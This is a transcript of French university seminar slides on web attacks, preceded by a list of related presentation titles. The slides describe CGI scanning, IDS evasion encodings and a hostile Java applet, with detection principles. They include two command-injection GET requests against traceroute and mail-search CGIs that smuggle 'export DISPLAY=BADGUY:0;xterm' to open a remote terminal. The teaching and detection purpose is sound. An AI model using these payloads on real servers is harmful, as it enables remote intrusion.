Auvray Vincent Blanchy François Bonmariage Nicolas Mélon Laurent

Slides:



Advertisements
Présentations similaires
Le struts validator – framework de validation
Advertisements

Internet et le client- serveur Licence Pro IE Cours Internet / Intranet Le Web HTML Protocoles Le client universel Contenus dynamiques.
TOUQUET Arnaud ▪ GI05 BLONDEEL Igor ▪ GM05
- Couche 7 - Couche application. Sommaire 1)Introduction 1)DNS 1)FTP et TFTP 1)HTTP 1)SNMP 1)SMTP 1)Telnet.
DUDIN Aymeric MARINO Andrès
Exposé de Système - Informatique et Réseau
TRANSFER Alger – Serveur Web Nicolas Larrousse Septembre Petit historique du Worl Wide Web Notion dHypertexte Extension à internet par Tim Berners.
Cours 6 : XML et les architectures N-tiers – Tier Applicatif
2-Generalites FTP:Protocole De transfert de fichiers sur un réseau TCP/IP. Permet de copier des fichiers depuis ou vers un autre ordinateur du reseaux,d'administrer.
Design Pattern MVC En PHP5.
Web dynamique : solutions Sessions sous HTTP
TP 3-4 BD21.
11:16:331 Programmation Web Programmation Web : Formulaires HTML Jérôme CUTRONA
Soutenance de stage · Par : Guillaume Prévost · Entreprise : Cynetic
Common Gateway Interface
Oct.-2000DESS IIDEE © B. BAH 1 ASP Caractéristiques dun fichier ASP Son extension : « *.asp » La balise: Son indépendance vis à vis de toute plate–forme,
Le Téléphone Russe Le Téléphone Russe. Le Téléphone Russe Le Téléphone Russe.
LOG 02 Bases de Données Avancées Rappels sur JSP / Servlet
SECURITE DU SYSTEME D’INFORMATION (SSI)
Développement dapplications web Initiation à la sécurité 1.
1 Sécurité Informatique : Proxy Présenter par : Mounir GRARI.
WD et Java Les Pièges, comment les contourner ? 22/11/2008.
Comprendre l’environnement Web
Applications Chapitre B17 et C18
Labview Programmation réseau Communication par sockets
Interaction audio sur le site web du LIA
ASP.NET Par: Hugo St-Louis. C ARACTÉRISTIQUES A SP. NET Évolution, successeur plus flexible quASP (Active Server Pages). Pages web dynamiques permettant.
Les relations clients - serveurs
Gestion des bases de données
Développement dapplications web Authentification, session.
Abderrahmane Bouarissa Damien Burglin Arnaud Sansig
Web dynamique PhP + MySQL AYARI Mejdi 2006
PhP-MySQL Pagora 2012/2013 CTD 1 - Presentation de moi ^^
JSP (Java Server Pages)
1 CGP2P XtremWeb :mise en œuvre et management Laboratoire de laccelerateur lineaire, Paris Sud University, Orsay, France
Document élaboré à Centrale Paris par Pascal Morenton LES TECHNOLOGIES DU WEB 1. LES PHASES D UN DEPLOIEMENT DE RESEAUX 2. LE LANGAGE HTML 3. LE LANGAGE.
JEE 5 F.Pfister 2 institut eerie JEE – Une plateforme serveur  Développement et exécution d'applications réparties.
La Programmation CGI Principe Général Traitement des informations
Internet et le client- serveur Licence Pro IE Cours Internet / Intranet Le Web HTML Protocoles Le client universel Contenus dynamiques.
Test d ’un système de détection d ’intrusions réseaux (NIDS)
Audit de réseau. Audit réseau Responsable : Jean-François RODRIGUEZ Objectif : tester les failles d’une machine ou d’un réseau Outil : nessus Audit réseau.
KRIKORIAN Pierre HILMI Brahim
PHP 5° PARTIE : LES COOKIES
Cours de programmation web
Gestion à distance Netsh et rcmd.
1 F o r m a t i o n A R S FTP anonyme, Archie 2 F o r m a t i o n A R S FTP ANONYMOUS m Premier service d'accès à des documents publics. m Repose très.
Séminaire INGI 2591 Attaques Web Accardo Nicolas Blerot Olivier Couvreur Pascal Depry Fabian.
420-B63 Programmation Web Avancée Auteur : Frédéric Thériault 1.
Back Orifice Scénario en 3 étapes - Préparation & envoi - Infection & Installation - Prise de contrôle - Détections Possibles - Net-Based - Host-Based.
Architecture d’application CNAM Le mode Client/Serveur Le programme n’a besoin d’être compatible qu’avec l’ordinateur sur lequel il est installé.
Les Réseaux Informatiques Clients & Serveurs Le protocole FTP Laurent JEANPIERRE DEUST AMMILoR.
Maxly MADLON Consultant NES
Abderrahmane Bouarissa Damien Burglin Arnaud Sansig
PHP 6° PARTIE : LES SESSIONS 1.Introduction 2.Identificateur de session 3.Variables de session 4.Client / Serveur 5.Principe 6.Ouverture de session 7.Enregistrement.
SCAN400 , envoi mail des résultats JDSEE, JDFIELD
Séminaire INGI 2591 Attaques Web Accardo Nicolas INFO 22 Blerot Olivier INFO 22 Couvreur Pascal INFO 22 Depry Fabian INFO 23.
Gestion Parc Informatique Client UNIX Rémy Chaumard – BTSIRIS2 – projet GPI client UNIX – revue n1.
 Formulaires HTML : traiter les entrées utilisateur
Initiation au JavaScript
Présentation ESTRABOX
Les Servlets Présentation Cycle de vie Principe de fonctionnement
Module 133 Développer des applications Web Introduction à PHP.
Architecture Client/Serveur
CPI/BTS 2 Programmation Web Les sites dynamiques Prog Web CPI/BTS2 – M. Dravet – 02/10/2003 Dernière modification: 02/10/2003.
LE SERVEUR PROXY Un serveur proxy (traduction française de «proxy server», appelé aussi «serveur mandataire») est à l'origine une machine faisant fonction.
Sécurité des Web Services
TWP Toolkit Formation 21/10/2009.
Chapitre8 Configuration de l'adressage TCP/IP et de la résolution de noms Module S41.
APP-TSWD Apprentissage Par Problèmes Techniques des Sites Web Dynamiques Licence Professionnelle FNEPI Valérie Bellynck, Benjamin Brichet-Billet, Mazen.
Par Michael Tran Injection. Présentation du problème C’est faire en sorte que l’entrée utilisateur de l’attaquant est considérée de façon spéciale Permet.
Transcription de la présentation:

Auvray Vincent Blanchy François Bonmariage Nicolas Mélon Laurent Attaques WEB Auvray Vincent Blanchy François Bonmariage Nicolas Mélon Laurent

Attaques WEB : schémas Client → Serveur : Serveur → Client : Applet JAVA, ActiveX, JavaScript, … WEB Scan (Whisker) Exploitation des failles des CGI

Common Gateway Interface Le “Common Gateway Interface” (CGI) est un standard pour interfacer des applications externes avec un serveur WEB. Un programme CGI est un exécutable appelé par le serveur WEB avec des paramètres fournis par le client et générant une page HTML envoyée au client. Un contenu dynamique peut ainsi être généré.

WEB (CGI) scan Objectif : Méthode : Recherche sur un serveur WEB de CGI accessibles possédant des failles de sécurité connues ou de fichiers normalement inaccessibles mais qui le sont par erreur de configuration Méthode : Le scanneur se base sur une liste de CGI et de répertoires les contenants habituellement Cette recherche utilise les méthodes du protocole HTTP “GET”, “POST” et/ou “HEAD” Certains scanneurs (dont Whisker) utilisent des techniques de scan censées éviter la détection

Dissimulation du scan Différentes techniques utilisant la différence entre l’interprétation de la requête par l’IDS et le serveur : Reverse traversal : « /cgi-bin/bla/bla/../../bad.cgi » URL encoding : « /%42%41%44.%43%47%49 » Session splicing : envoyer plusieurs paquets TCP pour une seule requête HTTP ex : « GET », « / », « b », « ad. », « cg », « i » …

Exploitation des failles L’exploitation dépend du CGI : Buffer overflow Mauvaise vérification des arguments : Exécution d’une commande (grâce, par exemple, à l’envoi d’un paramètre contenant le caractère “&” suivi de la commande à exécuter) Accès à des fichiers normalement interdits

CGI “Traceroute” Utilité du CGI : accès à l’utilitaire “traceroute” par le WEB Attaque : Le CGI réalise un appel à l’utilitaire traceroute sans vérifier ses arguments En envoyant la requête : « GET /cgi-bin/trace.cgi? host=bru;export%20DISPLAY=BADGUY:0;xterm » on obtient un terminal sur le serveur

CGI “Browse-mail” Utilité du CGI : rechercher dans les archives d’une mailing liste les emails contenant un certain pattern Attaque : Le CGI utilise l’utilitaire grep en effectuant une conversion systématique des codes ASCII hexadécimaux présents dans la requête En envoyant la requête GET /cgi-bin/browse-mail.pl?mailing_list=atrium& pattern=a%09b%0Aexport%09DISPLAY=BADGUY:0;xterm%0A&bouton=search on obtient un terminal sur le serveur

Signes associés aux attaques sur CGI Peu de signes visibles vu la nature de l’application : Requête contenant des caractères anormaux (visible dans les LOG ou sur le réseau) Connexion sortante du serveur vers l’attaquant Terminal (ou programme quelconque) s’exécutant avec le uid du serveur WEB Ces traces peuvent facilement être effacées par l’attaquant et doivent être monitorées en temps réel

Principe de détection Détection du scan (indépendant des CGI) Détection d’erreurs renvoyées par le serveur Détection dans la requête de CGI susceptibles d’être recherchés par un scanneur Repérage des techniques de masquage du scanneur Détection d’une attaque sur un CGI installé (spécifique aux CGI installés) : Repérage d’arguments anormaux pour le CGI considéré

Attaque côté client via une applet JAVA Principe de l’attaque : La consultation d’une page WEB provoque le lancement d’une applet hostile masquée à l’utilisateur Applet utilisée (file system scanning) : détecte l’absence ou la présence d’un fichier sur le disque en fonction du temps de refus à l’ouverture par la JVM rapatrie ensuite les résultats sur le serveur

Signes associés aux attaques par applet Pré-requis : browser utilisant une version de JAVA présentant une faille Peu de signes visibles : ouverture par une « untrusted » applet d’une connexion vers son serveur d’origine risque de génération de nombreux false positive inutile dans le cas d’une applet effectuant des dégâts locaux

Détection de notre attaque par applet Réponse à une requête HTTP contenant : le tag <applet> présence dans le byte code de chaînes telles que « /etc/passwd » ou « c:\winnt » mais elles pourraient être chiffrées parsing du byte code à la recherche d’instructions spécifiques mais risque de false positive Ouverture d’une connexion de retour vers le serveur